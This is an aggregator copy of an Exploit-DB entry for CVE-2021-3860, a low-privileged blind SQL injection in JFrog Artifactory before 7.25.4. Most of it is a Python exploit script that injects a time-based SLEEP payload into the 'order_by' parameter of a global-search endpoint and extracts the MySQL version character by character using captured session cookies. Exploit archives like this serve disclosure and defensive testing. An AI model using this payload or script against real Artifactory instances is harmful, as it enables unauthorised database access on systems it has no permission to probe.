3

[webapps] JFrog Artifactory < 7.25.4 - Blind SQL Injection

 7 months ago
source link: https://www.exploit-db.com/exploits/51806
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

JFrog Artifactory < 7.25.4 - Blind SQL Injection

EDB-ID:

51806

EDB Verified:

Author:

ardr

Type:

webapps

Exploit:

  /  

Platform:

PHP

Date:

2024-02-19

Vulnerable App:

# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date: 
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below


warnings.simplefilter('ignore',InsecureRequestWarning)


session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint 
pos = 1
# cookies = Replace this with captured cookies from the above endpoint 


while True:
    for i in string.digits + '.':
        data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
        start = time.time()
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
        if len(version) >= 6:
            stdout.write("\n")
            print(f"Version found: MySQL {version}")
            exit(0)

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK